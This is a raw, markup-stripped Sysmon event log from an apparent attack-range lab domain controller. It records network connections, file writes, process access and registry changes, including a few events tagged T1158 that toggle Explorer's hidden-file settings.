-EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 354300x80000000000000008723Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.433{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local59380- 354300x80000000000000008722Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.401{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53606-false10.0.1.12-8000- 354300x80000000000000008721Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.367{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53605-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x80000000000000008720Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.367{266CAFBE-64FC-6064-1001-00000000AE01}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53605-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x80000000000000008719Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.362{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 
SERVICEtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53604-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x80000000000000008718Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.362{266CAFBE-64FC-6064-1001-00000000AE01}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53604-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 23542300x80000000000000008717Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:10.267{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=D74ECFC890D4C27962B4FDCDFDF5EDF0,SHA256=382129CBBCCB64BBF87FBEB7143083BC1049D1243563E6E6E31445EDA57989BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008716Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:10.204{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FD05B61FA6FF5DFD2CA54221E386393B,SHA256=99EE4203273FBB2544C8D4293220CC6F4652FE84D538FC84B1B041B0AAEDBB70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008715Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:10.033{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F084D69A363885334B922E70A4B3CE3,SHA256=02E4FAA1C800F3D69D3F49B16290D9B689B60AF4DDEAC9398AB52542E7CBC010,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008739Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:11.732{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008738Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:11.732{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008737Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:11.732{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008736Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:11.732{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000008735Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.366{266CAFBE-64FC-6064-1001-00000000AE01}6660win-dc-892.attackrange.local0fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe 10341000x80000000000000008734Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:11.077{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-64FE-6064-1201-00000000AE01}3352C:\Windows\System32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008733Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:11.077{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64FE-6064-1201-00000000AE01}3352C:\Windows\System32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000008732Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:11.062{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D325BE328530BD7A74BE6E024DF03D1C,SHA256=25CF2183089260FB79523E004F0307BFC0B17ECF4634C442FF2F8C818473E38E,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000008741Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:12.216{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{939D20AC-8036-406F-BD5C-BF672896BD71} {A08CE4D0-FA25-44AB-B57C-C7B1C323E0B9} 0xFFFFBinary Data 23542300x80000000000000008740Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:12.107{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4D3CC5915122E8B9184FB93F55EA2A4,SHA256=C2F2EB880A09739F4D2190B40351A59A78F0AEB144F40271046B8700DA51165C,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000008743Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:13.338{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=1F441150507115D5AD845AAC7072A165,SHA256=4CDFCB961C36D7B2644AE6E99E14DAFA581CED125C900112FAAA09E8519ED3A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008742Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:13.104{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B0B91E55D9FD59AFC4547EFBBC92A92,SHA256=A40EE62C54658FC4FA03DB5B99EBC85CD1F3B58DF8C2AF2F15FEC20A8245DD04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008744Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:14.165{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30C065C84A0C831ED0688DB2C2B56CA3,SHA256=BD78C6265DC859578AF64BCD82764A3A8B5F42FA2CFAE8C6126D50DDFF5EE42C,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000008750Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1158SetValue2021-03-31 12:03:15.755{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHiddenDWORD (0x00000000) 13241300x80000000000000008749Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1158SetValue2021-03-31 
12:03:15.755{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExtDWORD (0x00000001) 13241300x80000000000000008748Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1158SetValue2021-03-31 12:03:15.755{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HiddenDWORD (0x00000002) 23542300x80000000000000008747Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:15.287{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=48041AEA27714D43586BB9537D96C063,SHA256=545556BBC851E2FC1B8AD626B8EF9C378F945E1A0CBB0CD2435A21551C1C2709,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008746Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:15.287{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=579D4C7BB406F5F46202E70D0F4966D2,SHA256=87E8A79A668765935BFCDB52489D772C4818EF60C527E5FFAFDCC28C7AA2ADD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008745Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:15.194{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAE69754CEDF49B3F003357A5F663C3B,SHA256=63F11A4871CD966FDF6DC3CF667A24D50E0753FF64648F305A82303073E13357,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008753Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:16.238{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB6A9EE217F58B220DE3E3C731809BAC,SHA256=D2FAC98FF68AD7B32919BDA9F2407E242AF2CCA7E471978620A14D4CA18AAB50,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000008752Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:14.464{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53607-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000008751Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:14.464{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53607-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 23542300x80000000000000008755Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:17.361{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB320F9734CA32827626E52FD42111A5,SHA256=F897F17669F166B3CD6D7FE5392FD0B98E54EB13AC6AF0B69BC20AB45A86953E,IMPHASH=00000000000000000000000000000000falsetrue 
354300x80000000000000008754Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:15.339{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53608-false10.0.1.12-8000- 13241300x80000000000000008758Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1158SetValue2021-03-31 12:03:18.375{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExtDWORD (0x00000000) 13241300x80000000000000008757Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1158SetValue2021-03-31 12:03:18.375{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HiddenDWORD (0x00000001) 23542300x80000000000000008756Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:18.375{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AC75A6D146B03C036E7DB8DD4A84E65,SHA256=DF241B2F474EAEE925F0E3EC5BE75B4A8246637BB86941F1C3B7953D29406520,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000008761Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:19.638{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{99D353BC-C813-41EC-8F28-EAE61E702E57} {A08CE4D0-FA25-44AB-B57C-C7B1C323E0B9} 0xFFFFBinary Data 
13241300x80000000000000008760Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:19.638{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{F81E9010-6EA4-11CE-A7FF-00AA003CA9F6} {000214E4-0000-0000-C000-000000000046} 0xFFFFBinary Data 23542300x80000000000000008759Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:19.388{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E769AA4CD6E4EC90B906E3E1820CF3E,SHA256=4977C9C410D670DE5781F3FD0F15A4C924C9E8D79B31B9E9331D8B0CDED2BD20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008762Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:20.402{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1057AA5CC2AB896AECA6B6B3F218FE0,SHA256=E0B47AC55523335B67CC3DBB128DE21AA961CDE44760910E11584DF776D8847C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008763Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:21.416{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBD77FFCA16D1A5BFA3BF976A44E7FE9,SHA256=F27C89092B5A7AF96CCDD3C0BEFCBF241D829986299AFB73CE058F90CF27F956,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000008765Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:22.476{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62E0F27F5D0883E47245B9E5D080D798,SHA256=55D480D53B1F67875433A7F975E8AD3428743BA51C22B8E7B3A70CEF1E144EE1,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000008764Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:22.039{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEC:\Temp\New Text Document.txt2021-03-31 12:03:22.039 23542300x80000000000000008767Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:23.505{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C60D9C027C4CC9E21FA35C155E59F079,SHA256=1DB4B0E9EF677B71BB757AF027AF6DC68133F087D0EA9DF4FF13E13276B71E0D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000008766Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:21.292{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53609-false10.0.1.12-8000- 10341000x80000000000000008779Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:24.815{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-650C-6064-1301-00000000AE01}6240C:\Windows\SysWOW64\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008778Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:24.815{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-650C-6064-1301-00000000AE01}6240C:\Windows\SysWOW64\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008777Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:24.706{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-650C-6064-1301-00000000AE01}6240C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008776Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:24.581{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-650C-6064-1301-00000000AE01}6240C:\Windows\SysWOW64\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 23542300x80000000000000008775Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:24.519{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 